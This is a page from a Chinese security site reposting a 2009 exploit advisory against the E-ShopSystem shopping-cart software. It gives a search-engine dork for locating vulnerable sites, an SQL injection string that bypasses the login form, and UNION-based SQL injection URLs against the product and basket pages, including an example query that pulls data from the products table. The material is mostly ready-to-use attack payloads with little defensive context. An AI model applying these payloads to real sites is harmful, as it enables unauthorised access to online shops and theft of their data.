首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
E-ShopSystem Auth Bypass / SQL Injection Multiple Vulnerabilities
来源:vfocus.net 作者:vfocus 发布时间:2009-02-02  
                          ||          ||   | ||        
                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
                  ( :   /    (_)    /           (   .  
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
|                  \ \____/ >> Kings of injection                      |
|                   \/___/                                             |
|                                                                      |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|


<<!>> Found by  :  Cyb3r-1sT

<<!>> C0ntact : cyb3r-1st [at] hotmail.com 
                   
<<!>> Groups : InjEctOr5 T3am 

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   : E-ShopSystem

<<->> download : http://www.shopsystem.co.il 

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================

<<->> D0rk    : http://www.google.co.il/search?hl=iw&q=Powered+by+ShopSystem&start=0&sa=N

<<->> Exploit :>>>
                                <<->> bypass sql injectiom <<->>

                     :>>>>  http://www.site.me/logon.asp

                     >>> user : Gaza ' or ' Gaza=Victory--     
        
                     >>> pass : Gaza ' or ' Gaza=Victory-- 


<<->> Exploit <<->>               
                                 <<->> sql injection <<->>

                      :>>>>  http://www.site.me/Pop.asp?pro_id=[sql]
                      :>>>>  http://www.site.me//addtobasket.asp?pro_id=[sql] 

         Example : :>>>>  http://www.site.me/Pop.asp?pro_id=-1+union+select+product_id,1,2+from+products&ID=

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , all muslims , [ www.tryag.cc/cc ] , [ sec-code.com/vb ] , str0ke 

# [2009-01-26]

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·NCTVideoStudio ActiveX DLLs 1.
·Script Toko Online 5.01 (shop_
·HtmlCapture ActiveX Control 2.
·SHOP-INET v4 (show_cat2.php gr
·MW6 Barcode ActiveX (Barcode.d
·WinFTP 2.3.0 (LIST) Remote Buf
·FlexCell Grid Control 5.6.9 Re
·PHP-CMS 1 (username) Blind SQL
·ITLPoll 2.7 Stable2 (index.php
·Wazzum Dating Software (userid
·Simple Machines Forum <= 1.1.7
·Groone's GLink Organizer (inde
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved